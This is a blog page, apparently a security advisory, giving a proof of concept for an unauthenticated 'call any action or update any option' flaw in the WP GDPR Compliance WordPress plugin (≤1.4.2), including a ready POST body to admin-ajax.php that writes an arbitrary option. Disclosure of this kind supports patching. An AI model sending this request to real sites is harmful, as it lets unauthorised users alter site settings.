WP GDPR Compliance <= 1.4.2 – Unauthenticated Call Any Action or Update Any Option

November 8, 2018
wp-gdpr-compliance Theme Builder Layout
Proof of Concept
1. Install WordPress.
2. Install the plugin.
3. Enable the request form and publish the page.

Update an option:

1. Go to the page with request form
2. Check the pages source for "ajaxSecurity" and copy the value
3. Send an ajax request (as POST) to wp-admin/admin-ajax.php (must be within the same browser) with the following body:

action=wpgdprc_process_action&security=SECURITY_TOKEN_HERE&data={ "type":"save_setting","append":true,"enabled": true,"option":"injected","value" :"option"}

After that check your wp_options table for the new value.

Share this article:

eHost-square-ad Theme Builder Layout

We’re listening.

Have something to say about this article? Share it with us on Facebook, Twitter or LinkedIn:


Related Posts

using-wpscan-to-find-wordpress-vulnerabilities-on-your-website Theme Builder Layout

Using WPScan to find WordPress vulnerabilities on your website

WPScan is an open source WordPress security scanner. You can use it to scan your WordPress website for known vulnerabilities within the WordPress core, as well as popular WordPress plugins and themes.Since it is a WordPress black box scanner, it mimics a real...

how-to-remove-malicious-redirects-from-your-site Theme Builder Layout

How To Remove Malicious Redirects From Your Site?

Is your WordPress website maliciously redirecting your users to unknown websites like ones that sell medical products? Chances are you’ve been hacked.Visitors could also be redirected to unsecured sites that host adult content, sell counterfeit products, or try to...

how-to-detect-the-bt-wordpress-hack Theme Builder Layout

How to Detect the .bt WordPress Hack

Just recently we cleaned a WordPress site which was apparently hacked many years ago. The hack was still active and our client was lucky that we found it since he asked us to host the site for him(we’ll talk about this added service in a new blog post). Every time we...

Get ALL Your SEO, WordPress & Divi News

Join Our Daily Roundup

SEO News and More

SEO News and More

Subscribe ToThe Weekly SEO Trade News Updates

Get the latest SEO, SEM and SMM marketing intel, tips and tricks from one of the best SEO Gurus online. 

Every Tuesday morning we send out an aggregated email listing all new posts on SEO Trade News.

Excellent! Now check your email to confirm your subscription.